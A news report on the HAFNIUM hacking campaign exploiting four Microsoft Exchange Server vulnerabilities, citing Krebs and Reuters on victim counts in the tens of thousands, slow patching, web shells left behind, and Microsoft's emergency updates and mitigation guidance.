According to new reports, the victims of the Chinese hacking group exploiting multiple vulnerabilities in Microsoft Exchange Server could number more than 30,000.
Unlike other recent large-scale cyber attacks like the compromise of the SolarWinds Orion IT management platform, the threat actors’ victims are wide ranging and include small businesses and local municipalities, according to security blogger and researcher Brian Krebs.
Cybersecurity experts have been scrambling to grasp the scope of this attack, which is shaping up to be even larger and more widespread than the SolarWinds attack allegedly carried out by a nation state group linked to Russia.
Microsoft last week released emergency security updates to fix the four vulnerabilities that hackers were exploiting to spy on victims’ email and potentially steal information, and the threat group has since ramped up their attacks on servers worldwide that remain unpatched, Krebs reported.
The hackers are adept at creating ways to access the victim servers even after they’ve left, including leaving behind a web shell, a tool that can be accessed from any browser that gives attackers administrative access.
Here’s more from Krebs:
Speaking on condition of anonymity, two cybersecurity experts who’ve briefed U.S. national security advisors on the attack told KrebsOnSecurity the Chinese hacking group thought to be responsible has seized control over “hundreds of thousands” of Microsoft Exchange Servers worldwide — with each victim system representing approximately one organization that uses Exchange to process email.
Meanwhile, Reuters also reported that the number of victims could be in the tens of thousands. The publication, citing people familiar with the U.S. government’s response, reported that the number of organizations compromised through these vulnerabilities is more than 20,000.
According to Reuters, organizations have been slow to patch the vulnerabilities, as only 10% had done so as of Friday.
One scan of connected devices showed only 10% of those vulnerable had installed the patches by Friday, though the number was rising.
Because installing the patch does not get rid of the back doors, U.S. officials are racing to figure out how to notify all the victims and guide them in their hunt.
All of those affected appear to run Web versions of email client Outlook and host them on their own machines, instead of relying on cloud providers. That may have spared many of the biggest companies and federal government agencies, the records suggest.
Microsoft — which calls the group HAFNIUM — and cybersecurity firm Volexity disclosed the vulnerabilities in blog posts last week. The attacks spear to have started as early as Jan. 6, when the U.S. was busy investigating the SolarWinds compromise and dealing with a riot and insurrection at the Capitol.
The vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 and are used as part of an attack chain that when used together, enable access to email accounts and installation of additional malware to facilitate long-term access to victim environments.
Microsoft has since released new mitigation guidance and a script for checking indicators of compromise.